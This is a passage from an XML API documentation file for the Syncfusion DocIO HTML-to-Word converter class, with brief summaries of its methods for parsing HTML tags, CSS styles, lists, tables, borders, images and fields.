        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseHeadingTag(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Xml.XmlNode)">
            <summary>
            Parse heading tag
            </summary>
            <param name="tf"></param>
            <param name="fontSize"></param>
            <param name="style"></param>
            <param name="node"></param>
            <param name="isBold"></param>
            <param name="isItalic"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.OnBlockquoteBegin(System.Xml.XmlNode)">
            <summary>
            Specifies the process when a blockquote tag starts
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.OnBlockquoteEnd">
            <summary>
            Specifies the process when a blockquote tag ends
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.OnDivBegin(System.Xml.XmlNode)">
            <summary>
            Specifies the process when a div tag starts
            </summary>
            <param name="node">Div node</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.OnDivEnd">
            <summary>
            Specifies the process when a div tag ends
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.OnTableEnd">
            <summary>
            Specifies the process when a table tag ends
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.OnTableBegin">
            <summary>
            Specifies the process when a table tag starts
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.WriteHyperlink(System.Xml.XmlNode)">
            <summary>
            COnverting Hyperlink in html to Doc
            </summary>
            <param name="node">Hyperlink node</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TraverseHyperlinkField(System.Xml.XmlNode)">
            <summary>
            Traverse child nodes of the Hyperlink Field
            </summary>
            <param name="node"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyHyperlinkStyle(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Apply Hyperlink style
            </summary>
            <param name="field"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseImageAttribute(System.Xml.XmlNode,Syncfusion.DocIO.DLS.IWPicture)">
            <summary>
            Parses image attribute
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseImageStyleAttribute(System.Xml.XmlAttribute,Syncfusion.DocIO.DLS.IWPicture)">
            <summary>
            Parses the Image style.
            </summary>
            <param name="attr">The attr.</param>
            <param name="pic">The Picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.WriteImage(System.Xml.XmlNode)">
            <summary>
            Writes the image.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetImageForPartialTrustMode(System.String,Syncfusion.DocIO.DLS.IWPicture)">
            <summary>
            Gets the image for partial trust mode.
            </summary>
            <param name="src">The source.</param>
            <param name="pic">The pic.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReadFully(System.IO.Stream)">
            <summary>
            Reads the fully.
            </summary>
            <param name="input">The input.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReadImageFile(System.String)">
            <summary>
            Reads the image file.
            </summary>
            <param name="imageLocation">The image location.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetImage(System.String)">
            <summary>
            Get Image
            </summary>
            <param name="src"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TryDownloadingFailedImage(System.String,Syncfusion.DocIO.DLS.ImageDownloadingFailedEventArgs)">
            <summary>
            Try downloading the image again with the given credentials
            </summary>
            <param name="src"></param>
            <param name="args"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseFormattingTags(System.Xml.XmlNode)">
            <summary>
            Appends the HTML text.
            </summary>
            <param name="para">The para.</param>
            <param name="textNode">The text node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.UpdateListLeftIndentStack(System.Single,System.Boolean)">
            <summary>
            Update List left indent stack
            </summary>
            <param name="leftIndent"></param>
            <param name="isInlineLeftIndent"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyFontSize(System.String,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Apply Font size specified in font tag
            </summary>
            <param name="fontSize"></param>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SetListMode(System.Boolean,System.Xml.XmlNode,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Sets the list mode.
            </summary>
            <param name="isBulleted">if set to <c>true</c> is bulleted.</param>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.WriteParagraph(System.Xml.XmlNode)">
            <summary>
            Writes the paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsHeadingStyle">
            <summary>
            Checks whether the current format is heading style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyParagraphStyle">
            <summary>
            Applies the paragraph style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyParagraphFormat(System.Xml.XmlNode)">
            <summary>
            Applies the paragraph format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.AdjustLeftIndentForList(System.Xml.XmlNode,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Adjust left indent value for list
            </summary>
            <param name="node"></param>
            <param name="format"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsBottomMarginNeedToBePreserved(System.Xml.XmlNode,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Check whether the bottom margin need to be preserved
            </summary>
            <param name="node"></param>
            <param name="format"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsTopMarginNeedToBePreserved(System.Xml.XmlNode,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Check whether the Top margin need to be preserved
            </summary>
            <param name="node"></param>
            <param name="format"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsLastNode(System.Xml.XmlNode)">
            <summary>
            Checks whether the node is last node within division
            </summary>
            <param name="node"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsDefinedInline(System.Xml.XmlNode,System.String)">
            <summary>
            Check whether the specified attribute defined inline
            </summary>
            <param name="node"></param>
            <param name="attName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyListFormatting(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Xml.XmlNode)">
            <summary>
            Apply list formatting
            </summary>
            <param name="pformat"></param>
            <param name="format"></param>
            <param name="node"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetListPatternType(System.String)">
            <summary>
            Get List Pattrn type
            </summary>
            <param name="attrValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyParagraphBorder(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Apply Paragraph border
            </summary>
            <param name="pformat"></param>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyDivParagraphFormat(System.Xml.XmlNode)">
            <summary>
            Apply the current div formt to the paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyTextFormatting(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Applies the formatting.
            </summary>
            <param name="tr">The tr.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyDivCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Apply the current div format to the character format of the textrange
            </summary>
            <param name="tr"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.EnsureStyle(System.Xml.XmlNode)">
            <summary>
            Ensures the style.
            </summary>
            <param name="node">The node.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ExtractValue(System.String)">
            <summary>
            Extract the value alone without units
            </summary>
            <param name="value">The Value</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseStyle(System.Xml.XmlNode)">
            <summary>
            Parses the style.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetFormat(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.String,System.String,System.Xml.XmlNode)">
            <summary>
            Get foramt
            </summary>
            <param name="format"></param>
            <param name="paramName"></param>
            <param name="paramValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseLineHeight(System.String,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Boolean@)">
            <summary>
            Parse line height
            </summary>
            <param name="paramValue"></param>
            <param name="format"></param>
            <param name="isPreserveBreakForInvalidStyles"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetRGBColor(System.String[],System.Int32@)">
            <summary>
            Get the color value
            </summary>
            <param name="value">The values of the specified style attribute.</param>
            <param name="j">Index of the RGB string</param>
            <returns>The color.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetColor(System.String)">
            <summary>
            Get Color value
            </summary>
            <param name="attValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetFontName(System.String)">
            <summary>
            Get Font Name
            </summary>
            <param name="paramValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetFont(System.String,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Gets the Font attribute values 
            </summary>
            <param name="paramValue">The values of font attribute.</param>
            <param name="format">Text format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.CalculateFontSize(System.String)">
            <summary>
            Calculate the font size
            </summary>
            <param name="value">Value specifying font size</param>
            <returns>The font size</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsFontSize(System.String)">
            <summary>
            Checks whether the value is font size
            </summary>
            <param name="value">Value to check</param>
            <returns>True if the value specifies font size, otherwise false.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseParagraphBorder(System.String,System.Drawing.Color@,System.Single@,Syncfusion.DocIO.DLS.BorderStyle@)">
            <summary>
            Parse Border
            </summary>
            <param name="paramValue"></param>
            <param name="borderColor"></param>
            <param name="borderWidth"></param>
            <param name="style"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseBorder(System.String,Syncfusion.DocIO.DLS.Border)">
            <summary>
            Parse Border
            </summary>
            <param name="paramValue"></param>
            <param name="borderColor"></param>
            <param name="borderWidth"></param>
            <param name="style"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsBorderWidth(System.String)">
            <summary>
            Checks whether the value is a border width
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.CalculateBorderWidth(System.String)">
            <summary>
            Calculate border width
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SeperateParamValue(System.String)">
            <summary>
            Seperate param value with its unit
            </summary>
            <param name="paramValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ToBorderType(System.String)">
            <summary>
            
            </summary>
            <param name="type"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.LeaveStyle(System.Boolean)">
            <summary>
            Leaves the style.
            </summary>
            <param name="stylePresent">if the style is present, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.UpdateParaFormat(System.Xml.XmlNode,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Updates the paragraph's format.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.AddStyle">
            <summary>
            Adds the style.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetAttributeValue(System.Xml.XmlNode,System.String)">
            <summary>
            Gets the attribute value.
            </summary>
            <param name="node">The node.</param>
            <param name="attrName">Name of the attr.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetStyleAttributeValue(System.String,System.String)">
            <summary>
            Gets the style attribute value
            </summary>
            <param name="styleAttr"></param>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ConvertToBoolValue(System.String)">
            <summary>
            Convert the paramValue to bool value
            </summary>
            <param name="paramvalue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ConvertSize(System.String,System.Single)">
            <summary>
            Converts the size.
            </summary>
            <param name="paramValue">The param value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetNumberBefore(System.String,System.String)">
            <summary>
            Gets the number before.
            </summary>
            <param name="val">The val.</param>
            <param name="end">The end.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.OnValidation(System.Object,System.Xml.Schema.ValidationEventArgs)">
            <summary>
            Called when [validation].
            </summary>
            <param name="sender">The sender.</param>
            <param name="args">The <see cref="T:System.EventArgs"/> instance containing the event data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.BuildListStyle(Syncfusion.DocIO.DLS.ListPatternType,System.Xml.XmlNode)">
            <summary>
            Builds the list style.
            </summary>
            <param name="styleName">Name of the style.</param>
            <param name="node">The xml node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.CreateListLevel(Syncfusion.DocIO.DLS.ListStyle,Syncfusion.DocIO.DLS.ListPatternType,System.Xml.XmlNode)">
            <summary>
            Creates a list level
            </summary>
            <param name="style"></param>
            <param name="type"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetListStyleType(System.Xml.XmlNode)">
            <summary>
            Gets the type of the list style.
            </summary>
            <param name="node">The node.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetListStyleTypeFromContainer(System.Xml.XmlNode)">
            <summary>
            Gets the list style type from container.
            </summary>
            <param name="node">The node.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.UpdateBulletChar(System.Int32,System.Xml.XmlNode,Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Update bullet char for list level
            </summary>
            <param name="listLevelNo">The list level no.</param>
            <param name="node">The node.</param>
            <param name="listLevel">The list level.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.CreateListStyle(System.Xml.XmlNode)">
            <summary>
            Creates the list style.
            </summary>
            <param name="node"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.CreateListOverrideStyle(System.Int32,System.Xml.XmlNode)">
            <summary>
            create the list Override style.
            </summary>
            <param name="levelNumber"></param>
            <param name="node"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.PrepareListStart(System.String,System.String)">
            <summary>
            Prepares the list start.
            </summary>
            <param name="start">The start.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsListNodeEnd(System.Xml.XmlNode)">
            <summary>
            Determines whether is end of level.
            </summary>
            <param name="node">The xml node.</param>
            <returns>
            	<c>true</c> if [is end of level] [the specified node]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsListNodeStart(System.Xml.XmlNode)">
            <summary>
            Determines whether is start of level.
            </summary>
            <param name="node">The node.</param>
            <returns>
            	<c>true</c> if [is start of level] [the specified node]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsInnerList(System.Xml.XmlNode)">
            <summary>
            Determines whether the specified node is inner list.
            </summary>
            <param name="node">The xml node.</param>
            <returns>
            	<c>true</c> if [is inner list] [the specified node]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseTable(System.Xml.XmlNode)">
            <summary>
            Parses the table.
            
            supported
            - table\tr\td construction
            - table or cell must have a width in pixel
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyDivTableFormat(System.Xml.XmlNode)">
            <summary>
            Apply the current div formt to the Table
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseTableRows(System.Xml.XmlNode,Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper,Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders)">
            <summary>
            Parses the table rows.
            </summary>
            <param name="node">The xml node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetOwnerTable(System.Xml.XmlNode)">
            <summary>
            Get Owner table
            </summary>
            <param name="node"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseCellAttrs(System.Xml.XmlNode,Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper,Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders)">
            <summary>
            Parses the cell attrs.
            </summary>
            <param name="node">The node.</param>
            <param name="cell">The cell.</param>
            <param name="spanHelper">The span helper.</param>
            <param name="tblBrdrs">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseCellStyle(System.Xml.XmlAttribute,Syncfusion.DocIO.DLS.WTableCell,System.Xml.XmlNode)">
            <summary>
            Parses the cell style.
            </summary>
            <param name="attr">The attr.</param>
            <param name="cell">The cell.</param>
            <param name="brdrs">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyBorders(Syncfusion.DocIO.DLS.Borders,System.Boolean)">
            <summary>
            Apply borders
            </summary>
            <param name="borders"></param>
            <param name="isTable"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyBorder(Syncfusion.DocIO.DLS.Border,System.Boolean)">
            <summary>
            Apply border type and line width
            </summary>
            <param name="border"></param>
            <param name="isTable"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyTableBorder(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Apply table border
            </summary>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyCellBorder(Syncfusion.DocIO.DLS.CellFormat,Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders)">
            <summary>
            Apply cell border
            </summary>
            <param name="format"></param>
            <param name="ownerTableFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseBorderLineWidth(Syncfusion.DocIO.DLS.Borders,System.String)">
            <summary>
            Parse border line width
            </summary>
            <param name="borders"></param>
            <param name="paramValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseBorderStyle(Syncfusion.DocIO.DLS.Borders,System.String)">
            <summary>
            Parse border style
            </summary>
            <param name="borders"></param>
            <param name="paramValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseBorderColor(Syncfusion.DocIO.DLS.Borders,System.String)">
            <summary>
            Parse border color
            </summary>
            <param name="borders"></param>
            <param name="paramValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseRowAttrs(System.Xml.XmlNode,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Parses the row attrs.
            </summary>
            <param name="rowNode">The row node.</param>
            <param name="row">The row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.UpdateHiddenPropertyBasedOnParentNode(System.Xml.XmlNode,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Update Hidden property of the row based on parent node
            </summary>
            <param name="rowNode"></param>
            <param name="row"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseTableAttrs(System.Xml.XmlNode,Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper,Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders)">
            <summary>
            Parses the table format.
            </summary>
            <param name="node">The node.</param>
            <param name="brdrs">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseTableStyle(System.Xml.XmlAttribute,Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper)">
            <summary>
            Parses the table style.
            </summary>
            <param name="attr">The attr.</param>
            <param name="brdrs">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseTableProperties(System.String,System.String)">
            <summary>
            Parse table properties
            </summary>
            <param name="paramName"></param>
            <param name="paramValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseTableBorder(System.String,Syncfusion.DocIO.DLS.Border)">
            <summary>
            Parse table border
            </summary>
            <param name="paramValue"></param>
            <param name="border"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseRowStyle(System.Xml.XmlAttribute,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Parses the Row style.
            </summary>
            <param name="attr">The attr.</param>
            <param name="brdrs">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyTableBorder(System.String,System.String,Syncfusion.DocIO.DLS.Border)">
            <summary>
            Apply table border
            </summary>
            <param name="paramName"></param>
            <param name="paramValue"></param>
            <param name="border"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ToPoints(System.String)">
            <summary>
            Toes the points.
            </summary>
            <param name="paramValue">The param value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetVerticalAlignment(System.String)">
            <summary>
            Gets the vertical alignment
            </summary>
            <param name="paramValue">The param value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetHorizontalAlignment(System.String)">
            <summary>
            Get HorizontalAlignment
            </summary>
            <param name="val"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.RomanToArabic(System.String)">
            <summary>
            Roman number to arabic number.
            </summary>
            <param name="numberStr">The number.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.Init">
            <summary>
            Inits this convertor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseCssStyle(System.Xml.XmlNode)">
            <summary>
            Parses the CSS style.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.FindCSSselectorType(System.String)">
            <summary>
            Parses the CSS style.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.FindCSSstyleItem(System.Xml.XmlNode,Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Finds the CSS style Item.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.FindIDSelector(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Xml.XmlNode)">
            <summary>
            Finds the ID selector from CSS style.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.FindClassSelector(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Xml.XmlNode)">
            <summary>
            Finds the Class selector form CSS style
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.FindDescendantSelector(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Xml.XmlNode)">
            <summary>
            Finds the descendant selector from CSS style.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.FindElementSelector(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Xml.XmlNode)">
            <summary>
            Finds the element selector from CSS style.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.FindChildSelector(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Xml.XmlNode)">
            <summary>
            Finds the Child selector from CSS style.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyCSSStyle(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat,System.Xml.XmlNode,Syncfusion.DocIO.DLS.CSSStyleItem)">
            <summary>
            Applies the CSS style.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseCSSTextFormatValue(System.String,Syncfusion.DocIO.DLS.CSSStyleItem)">
            <summary>
            Parse the CSS textformat values
            </summary>
            <param name="Key"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TraverseComments(System.Xml.XmlNode)">
            <summary>
            Traverse the comment
            </summary>
            <param name="node"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.InsertFieldBegin(System.String)">
            <summary>
            Insert the field begin 
            </summary>       
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseFieldSeparator">
            <summary>
            Parse the field separator
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseFieldEnd">
            <summary>
            Parse the FieldEnd
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseFieldCode(Syncfusion.DocIO.FieldType,System.String)">
            <summary>
            Parse the field code if span style is mso-field-code
            </summary>
            <param name="fieldType"></param>
            <param name="fieldCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseField(System.Xml.XmlNode)">
            <summary>
            Parse the field text 
            </summary>
            <param name="node"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.RemoveNewLineCharacter(System.String)">
            <summary>
             Need to replace newline character
            </summary>
            <param name="text"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsPreviousItemFieldStart">
            <summary>
            Gets or sets a value indicating whether  previous item is field start 
            </summary>
            <value>
              <c>true</c> if the instance is  field start ; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsStyleFieldCode">
            <summary>
            Gets or sets a value indicating whether  it is from  mso-field-code style
            </summary>
            <value>
              <c>true</c> if  it is ; otherwise, <c>false</c>.
            </value>       
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsFieldSeparate">
            <summary>
            Gets or sets a value indicating whether Previous item is Field separate
            </summary>
            <value>
            <c>true</c> if field range updated; otherwise, <c>false</c>.
            </value>        
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.CSSStyle">
            <summary>
            Gets the CSS style property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.ClientWidth">
            <summary>
            Get client width of the html textbody
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.BasePath">
            <summary>
            Get and set the base path
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.FieldStack">
            <summary>
             Gets the field stack.
             </summary>
             <value>The field stack.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.CurrentField">
            <summary>
            Gets the current field.
            </summary>
            <value>The current field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.CurrentFormat">
            <summary>
            Gets the current format.
            </summary>
            <value>The current format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.CurrentPara">
            <summary>
            Gets the current para.
            </summary>
            <value>The current para.</value>
        </member>
